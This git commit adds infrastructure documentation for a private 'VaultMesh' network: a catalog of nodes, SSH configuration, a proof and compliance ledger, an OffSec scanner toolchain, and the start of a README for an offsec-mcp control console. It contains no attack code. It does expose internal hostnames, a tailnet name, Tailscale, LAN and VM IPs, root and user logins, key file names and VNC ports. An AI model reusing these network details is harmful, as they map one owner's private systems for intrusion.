Initial commit - combined iTerm2 scripts

Contains:
- 1m-brag
- tem
- VaultMesh_Catalog_v1
- VAULTMESH-ETERNAL-PATTERN

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
Author: Vault Sovereign
Date: 2025-12-28 03:58:39 +00:00
Commit: 1583890199
111 changed files with 36978 additions and 0 deletions

@@ -0,0 +1,656 @@
# VAULTMESH INFRASTRUCTURE CATALOG
**Version 2.0 — Canon v1**
*Sovereign mesh network providing secure, cryptographically-verified infrastructure across distributed nodes. Core services run on the BRICK hypervisor and v1-nl-gate, with all access flowing over a Tailscale-powered SSH fabric. Designed as a living "civilization ledger": verifiable, reproducible, and portable.*
**VaultMesh Technologies**
Dublin, Ireland
---
## Global Catalog Index
Complete inventory of VaultMesh infrastructure capabilities and cross-references.
| ID | Capability | Pages |
|----|------------|-------|
| VM-001 | Sovereign mesh network via Tailscale MagicDNS (story-ule.ts.net) | 1, 2, 3 |
| VM-002 | Per-node ed25519 SSH keys with IdentitiesOnly isolation | 1, 2, 4 |
| VM-003 | Cryptographic proof system with Merkle tree receipts | 1, 5, 6 |
| VM-004 | Multi-tier node architecture (Forge/Mine/Gate/Lab/Mobile) | 1, 2, 3 |
| VM-005 | libvirt/KVM virtualization on BRICK hypervisor | 2, 3 |
| VM-006 | Dual-vault pattern (Vaultwarden + HashiCorp Vault) | 1, 10 |
| VM-007 | Cross-platform support (Arch, Debian, BlackArch, Android/Termux, iOS) | 2, 4 |
| VM-008 | Lawchain compliance ledger integration | 5, 6 |
| VM-009 | Oracle reasoning engine with tactical chains | 5, 7 |
| VM-010 | Shield defensive monitoring system + TEM | 7, 8 |
| VM-011 | AppSec toolchain (Nuclei, Trivy, Semgrep, TruffleHog) | 7, 8 |
| VM-012 | Proof anchoring (local, OTS, ETH, mesh attestation) | 5, 6 |
| VM-013 | Braid protocol for foreign ledger interop | 5, 6 |
| VM-014 | MCP server integration for AI orchestration | 7, 8 |
| VM-015 | Cockpit/VNC console access for VMs | 3, 4 |
| VM-016 | SSH ControlMaster multiplexing for performance | 1, 4 |
| VM-017 | Forge Flow (nexus-0 → GitLab → CI → shield-vm) | 9 |
| VM-018 | LAN fallback addressing when Tailscale unavailable | 1, 2 |
| VM-019 | mesh-stack-migration portable deployment bundle | 1, 3, 10 |
| VM-020 | Agent task automation with scheduled triggers | 7, 8 |
| VM-021 | GitLab CI/CD on gate-vm (mesh-core-01) | 9, 10 |
| VM-022 | Grafana + Prometheus observability stack | 1, 10 |
| VM-023 | Lab HV experimental nodes (phoenix-01, lab-mesh-01, etc.) | 2, 10 |
---
## 1. Infrastructure Overview
VaultMesh runs on a sovereign mesh of home, cloud, and virtual nodes. Core services (GitLab, monitoring, backup, dual-vault) live on the BRICK hypervisor and v1-nl-gate, with all access flowing over a Tailscale-powered SSH fabric.
### Key Findings
- Core "mesh-core-01" stack runs on a Debian VM (gate-vm) hosted on brick
- External edge/gate server (v1-nl-gate) fronts public connectivity and future tunnels
- shield-vm acts as the OffSec / TEM / machine-secrets node
- Dual-vault pattern: Vaultwarden for human secrets, HashiCorp Vault for machine/app secrets
- Tailscale tailnet + per-node SSH keys provide zero-trust style access across all layers
- Grafana + Prometheus give observability for both infrastructure and proof engines
### Core Components
- Tailscale mesh network (story-ule.ts.net tailnet)
- GitLab (self-hosted) on gate-vm for source, CI, and artifacts
- MinIO object storage for backups and artifacts
- PostgreSQL for GitLab and future ledgers
- Prometheus + Grafana for metrics and dashboards
- Vaultwarden (human credentials) + HashiCorp Vault (machine secrets)
- shield-vm: OffSec agents, TEM daemon, security experiments
- lab HV: experimental cluster for Phoenix/PSI and chaos drills
### Workflows / Pipelines
- **Forge Flow**: Android/laptop → SSH (Tailscale) → nexus-0 → edit/test → git push → GitLab on gate-vm → CI → deploy to shield-vm / lab
- **Backup Flow**: mesh-stack-migration bundle backs up GitLab/Postgres/Vaultwarden to MinIO with freshness monitoring and restore scripts
- **Proof Flow**: VaultMesh engines emit receipts and Merkle roots; DevOps release pipeline anchors PROOF.json and ROOT.txt to external ledgers
### Security Notes
- No password SSH: ed25519 keys only, with IdentitiesOnly enforced
- Tailscale tailnet isolates nodes from the public internet; v1-nl-gate used as controlled edge
- Dual-vault split: Vaultwarden for human secrets; HashiCorp Vault for machine/app secrets and CI
- Backups stored in MinIO, monitored by backup-freshness service with Prometheus metrics and Grafana alerts
---
## 2. Node Topology
VaultMesh spans four primary tiers—Forge, Mine, Gate, and Lab—with mobile endpoints riding on top. The BRICK hypervisor anchors the virtualization layer, while v1-nl-gate acts as the outer gate.
### Key Findings
- Clear separation between Forge (nexus-0), Core Mesh (gate-vm on brick), Edge Gate (v1-nl-gate), and Lab HV (ephemeral)
- BRICK hypervisor hosts the critical core VMs: debian-golden (template), gate-vm (mesh-core-01), shield-vm (shield-01)
- Tailscale tailnet binds everything together with MagicDNS and per-node hostnames
- v1-nl-gate is ready to act as external ingress or exit node for future services
- Node roles are stable but designed to evolve; lab nodes are intentionally ephemeral
### Forge Nodes
| Node | Hostname | OS | Role |
|------|----------|-----|------|
| nexus-0 | 100.67.39.1 (Tailscale) | BlackArch | Primary forge (dev) |
| kali-forge | (Tailscale IP) | Kali | Secondary OffSec lab |
### Mine Nodes — Primary Infrastructure
| Node | Hostname | OS | Role |
|------|----------|-----|------|
| gamma | gamma.story-ule.ts.net | Arch Linux | Home primary |
| beta | beta.story-ule.ts.net | Arch Linux | Backup node |
| brick | brick.story-ule.ts.net | Debian | Dell server, HV |
| w3 | w3.story-ule.ts.net | Raspbian | Raspberry Pi node |
### Gate Nodes — Edge / Exit
| Node | Hostname | OS | Role |
|------|----------|-----|------|
| v1-nl-gate | v1-nl-gate.story-ule.ts.net | Debian | Netherlands external gate |
| gate-vm | gate-vm.story-ule.ts.net | Debian | mesh-core-01 (core stack) |
### VM Nodes — On brick (libvirt/KVM)
| Node | Hostname | OS | Role |
|------|----------|-----|------|
| debian-golden | debian-golden.story-ule.ts.net | Debian | Golden image / template |
| gate-vm | gate-vm.story-ule.ts.net | Debian | Core services (GitLab, etc.) |
| shield-vm | shield-vm.story-ule.ts.net | Debian | Shield / TEM / machine vault |
### Lab Nodes — Experimental (Lab HV)
| Node | Hostname | Role |
|------|----------|------|
| lab-mesh-01 | lab-mesh-01 | Multi-node mesh tests |
| lab-agent-01 | lab-agent-01 | Agent/orchestration experiments |
| lab-chaos-01 | lab-chaos-01 | Chaos/failure drills |
| phoenix-01 | phoenix-01 | Phoenix/PSI prototypes |
### Mobile Nodes
| Node | Hostname | OS | Port |
|------|----------|-----|------|
| shield | shield.story-ule.ts.net | Android/Termux | 22 |
| bank-mobile | bank-mobile.story-ule.ts.net | iOS | 8022 |
### LAN Fallbacks
| Node | LAN IP |
|------|--------|
| gamma | 192.168.0.191 |
| brick | 192.168.0.119 |
| beta | 192.168.0.236 |
---
## 3. Virtualization Layer
The BRICK server runs libvirt/KVM and hosts the core VaultMesh VMs: debian-golden (template), gate-vm (mesh-core-01), and shield-vm (shield-01). Cockpit and VNC provide management and console access.
### Key Findings
- BRICK is the single hypervisor for core VaultMesh VMs
- debian-golden serves as a reusable golden image to clone new VMs
- gate-vm runs the mesh-stack-migration bundle (GitLab, MinIO, Prometheus, Grafana, Vaultwarden, backup-freshness, etc.)
- shield-vm is the Shield/OffSec node and home of the machine-secrets vault and TEM stack
- VM networking uses libvirt NAT (192.168.122.x), with VNC reachable via SSH tunnels
### VM Network Layout
| VM | NAT IP | VNC Port | Role |
|----|--------|----------|------|
| debian-golden | 192.168.122.187 | 5900 | Golden image / base template |
| gate-vm | 192.168.122.236 | 5901 | mesh-core-01 core stack host |
| shield-vm | 192.168.122.73 | 5902 | Shield/OffSec/TEM + machine vault |
### Workflows
- **VM Management**: Cockpit → https://brick:9090 → "Virtual Machines"
- **Console Access**: `ssh -L 5901:localhost:5901 brick`, then point a VNC client at `vnc://localhost:5901`
- **Image Pipeline**: Update debian-golden → snapshot → clone → new VM
- **Join to Mesh**: Boot VM → configure SSH → join Tailscale → register in SSH config
### Security Notes
- VNC ports are not exposed directly; they're reached via SSH tunnel into brick
- Each VM uses its own SSH host keys and per-node authorized_keys
- NAT isolation (192.168.122.x) reduces blast radius from VM compromise
- Installing Tailscale inside gate-vm/shield-vm avoids public exposure
### Dependencies
- libvirt, qemu-kvm, Cockpit, cockpit-machines on brick
- SSH and Tailscale inside each VM (where needed)
- TigerVNC or similar client on the operator's laptop
---
## 4. SSH Key Architecture
VaultMesh uses a strict per-node ed25519 SSH key model with IdentitiesOnly isolation, ControlMaster multiplexing, and mesh-wide access via Tailscale.
### Key Findings
- One keypair per destination node (id_gamma, id_brick, id_v1-nl-gate, id_gate-vm, id_shield-vm, etc.)
- IdentitiesOnly enforces key isolation and prevents cross-host key probing
- ControlMaster/ControlPath provide fast multiplexed SSH sessions
- Tailscale hostnames (story-ule.ts.net) give stable addressing; LAN IPs are fallback
- External service keys (GitHub/GitLab) are separate from infra keys
### Key Inventory (Infra Nodes)
| Key File | Target Node | Algorithm |
|----------|-------------|-----------|
| id_gamma | gamma | ed25519 |
| id_beta | beta | ed25519 |
| id_brick | brick | ed25519 |
| id_w3 | w3 | ed25519 |
| id_v1-nl-gate | v1-nl-gate | ed25519 |
| id_gate-vm | gate-vm | ed25519 |
| id_debian-golden | debian-golden | ed25519 |
| id_shield-vm | shield-vm | ed25519 |
### Forge + Mobile Keys
| Key File | Target | Algorithm |
|----------|--------|-----------|
| id_nexus-0 | nexus-0 | ed25519 |
| id_kali-forge | kali-forge | ed25519 |
| id_shield | shield | ed25519 |
| id_bank-mobile | bank-mobile | ed25519 |
### External Service Keys
| Key File | Service |
|----------|---------|
| id_ed25519_github | GitHub |
| id_ed25519_gitlab | GitLab |
### SSH Config Structure
```
Host *
ServerAliveInterval 30
ServerAliveCountMax 3
TCPKeepAlive yes
ControlMaster auto
ControlPath ~/.ssh/cm-%r@%h:%p
ControlPersist 10m
IdentitiesOnly yes
HashKnownHosts no
StrictHostKeyChecking accept-new
AddKeysToAgent yes
UseKeychain yes
Compression yes
Host nexus-0
HostName 100.67.39.1
User root
IdentityFile ~/.ssh/id_nexus-0
Host brick
HostName brick.story-ule.ts.net
User sovereign
IdentityFile ~/.ssh/id_brick
Host gate-vm
HostName gate-vm.story-ule.ts.net
User debian
IdentityFile ~/.ssh/id_gate-vm
Host shield-vm
HostName shield-vm.story-ule.ts.net
User debian
IdentityFile ~/.ssh/id_shield-vm
```
### Security Notes
- ed25519 keys provide strong security with small keys/signatures
- IdentitiesOnly ensures ssh never offers the wrong key to the wrong host
- StrictHostKeyChecking=accept-new uses TOFU while still catching host key changes
- No password authentication; all critical nodes are key-only
---
## 5. Cryptographic Proof System
VaultMesh uses a Merkle-tree-based proof system with receipts, roots, and cross-ledger anchoring. Each serious action (deploy, anchor, oracle decision, incident handling) emits a receipt.
### Key Findings
- All significant actions generate cryptographic receipts in append-only logs
- Merkle trees allow efficient inclusion proofs for large sets of receipts
- Anchors can be written to local files, Bitcoin (OTS), Ethereum, or mesh peers
- The release pipeline for vm-spawn automatically computes Merkle roots and anchors proof artifacts
- Braid-style interoperability allows importing and emitting foreign ledger roots
### Proof Lifecycle
1. Action occurs (e.g., Guardian anchor, deployment, oracle decision)
2. `proof_generate` creates a signed receipt with a Blake3 hash of the canonical JSON
3. Receipts accumulate until a batch threshold is reached
4. `proof_batch` constructs a Merkle tree and computes the root
5. `proof_anchor_*` writes the root to local files, timestamps, or blockchains
6. `proof_verify` allows any future verifier to confirm receipt integrity against a given root
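As a rough illustration of steps 2 and 4, here is a minimal Python sketch (assuming the third-party `blake3` package; signing, batch thresholds, and the real `proof_generate`/`proof_batch` code are omitted, so the names and receipt layout below are illustrative only):
```python
import json
import uuid
from datetime import datetime, timezone
from blake3 import blake3  # pip install blake3

def proof_generate(action: str, data: dict) -> dict:
    """Create an (unsigned) receipt with a Blake3 hash over canonical JSON."""
    canonical = json.dumps(data, sort_keys=True, separators=(",", ":"))
    return {
        "proof_id": str(uuid.uuid4()),
        "action": action,
        "timestamp": datetime.now(timezone.utc).isoformat(),
        "data_hash": blake3(canonical.encode()).hexdigest(),
    }

def merkle_root(leaf_hashes: list[str]) -> str:
    """Fold leaf hashes pairwise into one root, duplicating the last leaf on odd levels."""
    level = [bytes.fromhex(h) for h in leaf_hashes]
    if not level:
        return ""
    while len(level) > 1:
        if len(level) % 2:
            level.append(level[-1])
        level = [blake3(level[i] + level[i + 1]).digest() for i in range(0, len(level), 2)]
    return level[0].hex()

receipts = [proof_generate("guardian_anchor", {"node": "gate-vm", "seq": i}) for i in range(4)]
print("ROOT:", merkle_root([r["data_hash"] for r in receipts]))
```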
### Anchoring Strategies
| Type | Method | Durability |
|------|--------|------------|
| local | Files in `data/anchors/` | Node-local |
| ots | OpenTimestamps → Bitcoin | Public blockchain |
| eth | Calldata/contract → Ethereum | Public blockchain |
| mesh | Cross-attest via other nodes | Federated durability |
### Braid Protocol
- `braid_import`: import foreign ledger roots from other chains/nodes
- `braid_emit`: expose local roots for others to import
- `braid_status`: track imported vs. local roots and flag regressions
- Ensures root sequences are strictly advancing (no rollback without detection)
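A purely illustrative sketch of that regression check: imported roots are keyed per foreign ledger and must carry a strictly increasing sequence number, otherwise the import is rejected.
```python
class RegressionError(Exception):
    """Raised when an imported root does not strictly advance (possible rollback)."""

# last accepted (sequence, root) per foreign ledger; in-memory stand-in for the real store
_imported: dict[str, tuple[int, str]] = {}

def braid_import(ledger_id: str, sequence: int, root: str) -> None:
    prev = _imported.get(ledger_id)
    if prev is not None and sequence <= prev[0]:
        raise RegressionError(f"{ledger_id}: sequence {sequence} does not advance past {prev[0]}")
    _imported[ledger_id] = (sequence, root)
```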
### Receipt Schema (Conceptual)
```json
{
"proof_id": "uuid",
"action": "guardian_anchor",
"timestamp": "ISO8601",
"data_hash": "blake3_hex",
"signature": "ed25519_sig",
"witnesses": ["node_id"],
"chain_prev": "prev_proof_id"
}
```
### Security Notes
- Blake3 hashing for speed and modern security
- Ed25519 signatures for authenticity and non-repudiation
- Merkle trees make inclusion proofs O(log n)
- Multiple anchoring paths provide defense in depth against ledger loss
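To make the O(log n) claim concrete, a hedged verifier sketch (the pairing rule matches the root computation sketched above; the real `proof_verify` proof format may differ):
```python
from blake3 import blake3  # pip install blake3

def verify_inclusion(leaf_hash: str, path: list[tuple[str, str]], expected_root: str) -> bool:
    """Recompute the root from a leaf and its sibling path.

    `path` holds one (sibling_hash, side) pair per tree level, side being
    "left" or "right": O(log n) hashes for n receipts.
    """
    node = bytes.fromhex(leaf_hash)
    for sibling_hex, side in path:
        sibling = bytes.fromhex(sibling_hex)
        node = blake3(sibling + node if side == "left" else node + sibling).digest()
    return node.hex() == expected_root
```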
---
## 6. Lawchain Compliance Ledger
Lawchain is the compliance-focused ledger that tracks regulatory obligations, oracle answers, and audit trails via receipts. It integrates with the proof system to ensure every compliance answer has a cryptographic backbone.
### Key Findings
- Oracle answers are validated against a schema before being recorded
- Each answer is hashed and bound into a receipt, linking legal semantics to proofs
- Federation metrics allow multi-node Lawchain sync across the mesh
- Policy evaluation is driven by JSON inputs and produces JSON results for downstream tools
### Oracle Answer Schema (vm_oracle_answer_v1)
```json
{
"question": "string",
"answer_text": "string",
"citations": [{
"document_id": "string",
"framework": "string",
"excerpt": "string"
}],
"compliance_flags": {
"gdpr_relevant": true,
"ai_act_relevant": false,
"nis2_relevant": true
},
"gaps": ["string"],
"insufficient_context": false,
"confidence": "high"
}
```
### Compliance Q&A Workflow
1. Operator (or system) asks Lawchain a question
2. RAG retrieval gathers context from policy docs and regulations
3. LLM generates an answer draft
4. Answer is validated against vm_oracle_answer_v1 schema
5. Hash (Blake3 over canonical JSON) computed and receipt generated
6. Receipt anchored via proof system and stored in Lawchain
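A minimal sketch of steps 4 and 5, with a structural check standing in for full vm_oracle_answer_v1 validation and the canonical Blake3 hash described in the security notes below (the `blake3` package and the set of allowed confidence values are assumptions):
```python
import json
from blake3 import blake3  # pip install blake3

REQUIRED = {"question", "answer_text", "citations", "compliance_flags",
            "gaps", "insufficient_context", "confidence"}

def validate_answer(answer: dict) -> None:
    """Minimal structural check; the real schema validation is stricter."""
    missing = REQUIRED - answer.keys()
    if missing:
        raise ValueError(f"answer missing fields: {sorted(missing)}")
    if answer["confidence"] not in {"high", "medium", "low"}:  # assumed value set
        raise ValueError("unexpected confidence value")

def answer_hash(answer: dict) -> str:
    """Blake3 over the canonical (sorted-keys) JSON serialization."""
    return blake3(json.dumps(answer, sort_keys=True).encode()).hexdigest()
```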
### Compliance Frameworks Tracked
- **GDPR** data protection and subject rights
- **EU AI Act** risk classification, obligations, and logs
- **NIS2** network and information security
- Custom extensions can map additional frameworks (e.g., SOC2, ISO 27001)
### Security Notes
- Answer hash computed as `blake3(json.dumps(answer, sort_keys=True))`
- Receipts bind answer content, timestamps, and possibly node identity
- `gaps` and `insufficient_context` prevent fake certainty in legal answers
- Citations must reference real sources, enabling audit of answer provenance
---
## 7. Oracle Engine & Shield Defense
The Oracle Engine provides structured reason → decide → act chains, while Shield and TEM form the defensive veil. Together they detect threats, log them to the proof system, and (optionally) orchestrate responses.
### Key Findings
- Oracle chains decisions through explicit reasoning steps, not opaque actions
- Every significant decision can emit receipts into the proof spine
- Shield monitors multiple vectors (network, process, file, device, etc.)
- Response levels span from passive logging to active isolation or countermeasures
- Agent tasks allow scheduled or triggered operations (e.g., periodic scans)
### Oracle Tools
| Tool | Purpose |
|------|---------|
| oracle_status | Node status and capabilities |
| oracle_reason | Analyze situation, propose actions |
| oracle_decide | Make autonomous decision |
| oracle_tactical_chain | Full reason → decide → act chain |
### Oracle Tactical Chain Flow
1. **Context**: Collect current state (logs, metrics, alerts, lawchain state)
2. **Reason**: `oracle_reason` produces candidate actions with justifications
3. **Decide**: `oracle_decide` selects an action based on risk tolerance and constraints
4. **Act**: Execute playbooks, or keep in dry-run mode for simulation
5. **Prove**: Generate a receipt and anchor via proof system (optional but recommended)
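A conceptual, dry-run-by-default sketch of the chain; the `oracle_reason`/`oracle_decide` stubs here are illustrative stand-ins, not the real engine:
```python
from dataclasses import dataclass

@dataclass
class Decision:
    action: str
    justification: str
    risk: str  # "minimal" | "moderate" | "high"

def oracle_reason(context: dict) -> list[Decision]:
    """Stub: propose candidate actions with justifications."""
    if context.get("alerts"):
        return [Decision("isolate_node", "active alerts on node", "moderate"),
                Decision("log_only", "await operator review", "minimal")]
    return [Decision("log_only", "no anomalies in context", "minimal")]

def oracle_decide(candidates: list[Decision], risk_tolerance: str) -> Decision:
    """Stub: pick the first candidate within the allowed risk tolerance."""
    order = {"minimal": 0, "moderate": 1, "high": 2}
    allowed = [c for c in candidates if order[c.risk] <= order[risk_tolerance]]
    return allowed[0] if allowed else Decision("log_only", "nothing within tolerance", "minimal")

def oracle_tactical_chain(context: dict, risk_tolerance: str = "minimal", dry_run: bool = True) -> Decision:
    """Reason -> decide -> act; a receipt would normally be generated and anchored here."""
    decision = oracle_decide(oracle_reason(context), risk_tolerance)
    prefix = "[dry-run] would execute" if dry_run else "executing"
    print(f"{prefix}: {decision.action} ({decision.justification})")
    return decision

oracle_tactical_chain({"alerts": ["port scan from 10.0.0.9"]})
```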
### Shield Monitor Vectors
| Vector | Detection Capability |
|--------|---------------------|
| network | Port scans, unusual flows |
| wifi | Rogue APs, deauth attempts |
| bluetooth | Device enumeration/anomalies |
| usb | Storage/HID abuse |
| process | Suspicious binaries, behavior |
| file | Unauthorized modifications |
### Shield Response Levels
| Level | Action |
|-------|--------|
| log | Record event only |
| alert | Notify operator (Slack/email/etc.) |
| block | Prevent connection/action |
| isolate | Quarantine node/container/service |
| counter | Active response (e.g., honeypots) |
### Security Notes
- Dry-run mode is default for dangerous operations; production actions require explicit opt-in
- Risk tolerance levels gate what Shield/TEM may do without human approval
- All automated decisions can be bound to receipts for post-incident audit
---
## 8. AppSec Toolchain
VaultMesh uses an integrated application security toolchain rooted on shield-vm and CI pipelines. It combines vulnerability scanning, secret detection, SBOM generation, and IaC analysis.
### Key Findings
- Nuclei, Trivy, Semgrep, TruffleHog, Gitleaks, Checkov, Syft, and Grype cover distinct layers
- shield-vm is the natural home for heavy security scans and OffSec tooling
- CI pipelines can call out to shield-vm or run scanners directly in job containers
- Secret detection runs in both pre-commit and CI stages for defense-in-depth
- SBOM generation and vulnerability scanning support long-term supply chain tracking
### Tool Capabilities
| Tool | Target Types | Output |
|------|-------------|--------|
| nuclei | URLs, IPs, domains | Findings by severity |
| trivy | Images, dirs, repos, SBOMs | CVEs, secrets, configs |
| semgrep | Source code directories | Security findings |
| trufflehog | Git, S3, GCS, etc. | Verified secrets |
| gitleaks | Git repos, filesystems | Secret locations |
| checkov | Terraform, K8s, Helm, etc. | Misconfigurations |
| syft | Images, dirs, archives | CycloneDX/SPDX SBOM |
| grype | Images, dirs, SBOMs | Vulnerability list |
### MCP Tools
- offsec_appsec_nuclei_scan
- offsec_appsec_trivy_scan
- offsec_appsec_semgrep_scan
- offsec_appsec_trufflehog_scan
- offsec_appsec_gitleaks_scan
- offsec_appsec_checkov_scan
- offsec_appsec_syft_sbom
- offsec_appsec_grype_scan
### Workflows
1. **SBOM Pipeline**: Syft → produce CycloneDX JSON → Grype → vulnerability report
2. **Pre-merge Scans**: CI job runs Semgrep, Trivy, Gitleaks on merge requests
3. **Periodic Deep Scans**: shield-vm runs scheduled AppSec scans, logging high-severity findings
4. **Policy Integration**: High-severity or critical findings feed into Lawchain/Lawchain-like policies
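A hedged sketch of workflow 1 driven from Python, assuming the `syft` and `grype` CLIs are on PATH; the output flags shown are the common ones and may need adjusting to your installed versions:
```python
import json
import subprocess
from pathlib import Path

def sbom_pipeline(target: str, workdir: str = ".") -> list[dict]:
    """Generate a CycloneDX SBOM with syft, scan it with grype, return the matches."""
    sbom_path = Path(workdir) / "sbom.cdx.json"
    sbom = subprocess.run(["syft", target, "-o", "cyclonedx-json"],
                          capture_output=True, text=True, check=True)
    sbom_path.write_text(sbom.stdout)
    scan = subprocess.run(["grype", f"sbom:{sbom_path}", "-o", "json"],
                          capture_output=True, text=True, check=True)
    return json.loads(scan.stdout).get("matches", [])

# Example: findings = sbom_pipeline("alpine:3.19")
```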
### Security Notes
- Nuclei and Trivy should be rate-limited when targeting external assets
- Secret detection in CI uses only_verified where possible to reduce noise
- Baseline files can exclude accepted findings while still tracking new issues
- AppSec findings for high-value systems may be recorded as receipts in the proof system
---
## 9. Forge Flow — From Phone to Shield
The Forge Flow describes how code moves from the Sovereign's phone and forge node (nexus-0) through GitLab on gate-vm, into CI, and finally onto shield-vm and lab nodes.
### Key Findings
- Primary forge is nexus-0 (BlackArch), reachable via Tailscale from Android/laptop
- vaultmesh repo lives on nexus-0 under `/root/work/vaultmesh`
- Git remote points to GitLab on gate-vm (gitlab.mesh.local)
- GitLab CI handles lint → test → build → deploy
- Production-like deployments land on shield-vm; experiments land on Lab HV nodes
### Forge Flow Diagram
```
Android / Laptop
↓ (Tailscale SSH)
nexus-0 (BlackArch forge)
↓ (git push)
GitLab @ gate-vm (mesh-core-01)
↓ (CI: lint → test → build)
shield-vm (Shield / TEM) and Lab HV (phoenix-01, etc.)
```
### Steps
**1. Inception (Connect to Forge)**
```bash
ssh VaultSovereign@100.67.39.1 # nexus-0 via Tailscale
tmux attach -t sovereign || tmux new -s sovereign
```
**2. Forge (Edit & Test)**
```bash
cd /root/work/vaultmesh
nvim .
python3 -m pytest tests/ -v
python3 cli/vm_cli.py guardian status
python3 cli/vm_cli.py console sessions
```
**3. Transmit (Git Push to GitLab)**
```bash
git add -A
git commit -m "feat(guardian): improve anchor receipts"
git push origin main # or feature branch
```
**4. Transform (GitLab CI on gate-vm)**
- `.gitlab-ci.yml` stages: lint → test → build → deploy
**5. Manifest (Deploy to Shield or Lab)**
- CI deploy job: main → shield-vm, lab branches → lab-mesh-01 / phoenix-01
- Manual fallback: `ssh shield-vm 'cd /opt/vaultmesh && git pull'`
**6. Observe (Metrics & Proofs)**
- Grafana dashboards (gate-vm) for system and proof metrics
- Guardian CLI for roots and scrolls
- Lawchain/oracle dashboards for compliance view
### Infrastructure Roles in the Flow
- **nexus-0** → live forge, fast iteration, experiments
- **gate-vm** → GitLab + CI + registry + observability
- **shield-vm** → OffSec/TEM node and primary runtime for security engines
- **Lab HV** → ephemeral experimentation environment
---
## 10. Canonical Infrastructure — VaultMesh v1
This page defines the canonical infrastructure for VaultMesh as of the first full catalog: which nodes exist, what runs where, and which services are considered "core mesh".
### Key Findings
- BRICK + v1-nl-gate + nexus-0 form the spine of the system
- gate-vm (mesh-core-01) is the canonical host for the mesh-stack-migration bundle
- shield-vm is the canonical Shield/TEM node with OffSec tooling and machine-secrets vault
- Dual-vault pattern is standard: Vaultwarden (human), HashiCorp Vault (machine)
- Grafana is the canonical dashboard layer; Wiki.js is explicitly **not** part of the new architecture
### Canonical Nodes and Roles
| Node | Role | Description |
|------|------|-------------|
| nexus-0 | Forge | Primary dev/forge node (BlackArch) |
| brick | Hypervisor | Hosts core VMs (debian-golden, gate-vm, shield-vm) |
| v1-nl-gate | External Gate | Cloud-facing edge server, future ingress |
| gate-vm | mesh-core-01 (Core Stack) | GitLab, MinIO, Postgres, Prometheus, Grafana, Vaultwarden, backup-freshness, Traefik, WG-Easy |
| shield-vm | shield-01 (Shield/TEM) | OffSec agents, TEM, HashiCorp Vault, incidents & simulations |
| lab-* | Experimental Mesh | lab-mesh-01, lab-agent-01, lab-chaos-01, phoenix-01 |
### Canonical Core Services (gate-vm / mesh-core-01)
- **GitLab** source control, CI/CD
- **MinIO** object storage & backups
- **PostgreSQL** GitLab and future service DBs
- **Prometheus** metrics
- **Grafana** dashboards (infra, backup freshness, proof metrics)
- **Vaultwarden** human password vault (browsers, logins)
- **backup-freshness** monitors MinIO backup age
- **Traefik** reverse proxy and ingress
- **WG-Easy** (optional) simplified WireGuard access
### Canonical Security / Shield Services (shield-vm)
- **HashiCorp Vault** machine/app secrets
- **TEM daemon** threat transmutation engine
- **OffSec tools and MCP** Oracle, Shield, AppSec scanners
- **Agent/task scheduler** scheduled security workflows
- Optional: local Prometheus exporters for node/security metrics
### Explicitly Non-Core
- **Wiki.js** not part of canonical infra; documentation handled via Git-based docs/portals
- Legacy projects marked ARCHIVE (e.g., old offsec-shield architecture, sovereign-swarm)
### Migration & Portability
`mesh-stack-migration/` enables redeploying the entire core stack to a fresh host:
1. Copy bundle → set `.env` → `docker compose up -d`
2. Run FIRST-LAUNCH and DRY-RUN checklists
3. VMs can be moved or recreated using debian-golden as base
### Evolution Rules
If a service becomes critical and stateful, it must:
- Emit receipts and have a documented backup/restore plan
- Expose metrics consumable by Prometheus
- Be referenced in the Canonical Infrastructure page with node placement
Experimental services stay on Lab HV until they prove their value.
---
## VAULTMESH
*Earth's Civilization Ledger*
**Solve et Coagula**
vaultmesh.org • offsecshield.com • vaultmesh.earth
---
*VaultMesh Infrastructure Catalog v2.0 — Canon v1*
*VaultMesh Technologies • Dublin, Ireland*

@@ -0,0 +1,353 @@
# IoTek.nexus + offsec-mcp
**The Veil becomes infrastructure.**
A real control surface for VaultMesh sovereign infrastructure.
```
┌─────────────────────────────────────────────────────────────────────────────┐
│ IoTek.nexus ● MESH 7 ● SHIELD ARMED ● WS LIVE 12:34 │
├────────────────────┬────────────────────────────────────────────────────────┤
│ │ │
│ [Console] │ sovereign@nexus ~/vaultmesh $ status │
│ │ │
│ ↓ HTTP POST │ ╦ ╦╔═╗╦ ╦╦ ╔╦╗╔╦╗╔═╗╔═╗╦ ╦ │
│ │ ╚╗╔╝╠═╣║ ║║ ║ ║║║║╣ ╚═╗╠═╣ │
│ [offsec-mcp] │ ╚╝ ╩ ╩╚═╝╩═╝╩ ╩ ╩╚═╝╚═╝╩ ╩ │
│ │ │
│ ↓ WebSocket │ Shield: ● ARMED │
│ │ Proof: ● 1247 receipts │
│ [Live Updates] │ Mesh: ● 7 nodes │
│ │ │
└────────────────────┴────────────────────────────────────────────────────────┘
```
---
## Quick Start
### 1. Install dependencies
```bash
pip install -r requirements-mcp.txt
```
### 2. Start the backend
```bash
# Development (auto-reload)
uvicorn offsec_mcp:app --reload --port 8080
# Production (bind to Tailscale IP only)
uvicorn offsec_mcp:app --host 100.x.x.x --port 8080
```
### 3. Open the console
```bash
# Option A: Open the HTML directly
open iotek-nexus-live.html
# Option B: Serve via backend (configure STATIC_DIR in offsec_mcp.py)
# Then visit http://localhost:8080/
```
---
## Architecture
```
┌──────────────────────────────────────────────────────────────────┐
│ CONSOLE LAYER │
│ iotek-nexus-live.html │
│ - Local commands (help, clear, history, whoami, neofetch) │
│ - MCP backend calls (status, mesh, shield, proof, agents) │
│ - WebSocket live updates │
│ - Mock fallback when backend unavailable │
└───────────────────────────┬──────────────────────────────────────┘
│ HTTP POST /mcp/command
│ WebSocket /ws
┌──────────────────────────────────────────────────────────────────┐
│ BACKEND LAYER │
│ offsec_mcp.py (FastAPI) │
│ - Command routing & execution │
│ - Tailscale identity extraction │
│ - SQLite persistence (sessions, commands, events) │
│ - WebSocket broadcast for live updates │
└───────────────────────────┬──────────────────────────────────────┘
│ subprocess / API calls
┌──────────────────────────────────────────────────────────────────┐
│ SYSTEM LAYER │
│ - Tailscale (mesh status, node inventory) │
│ - Shield vectors (network, wifi, usb, process, file) │
│ - Proof engine (receipts, Merkle roots, anchors) │
│ - Agent subsystem (sentinel, orchestrator, analyst, executor) │
└──────────────────────────────────────────────────────────────────┘
```
---
## API Contract
### POST /mcp/command
Request:
```json
{
"session_id": "vaultmesh-2025-12-07-01",
"user": "sovereign",
"command": "mesh status",
"args": [],
"cwd": "/vaultmesh",
"meta": {
"client": "iotek-nexus-cli",
"version": "1.0.0"
}
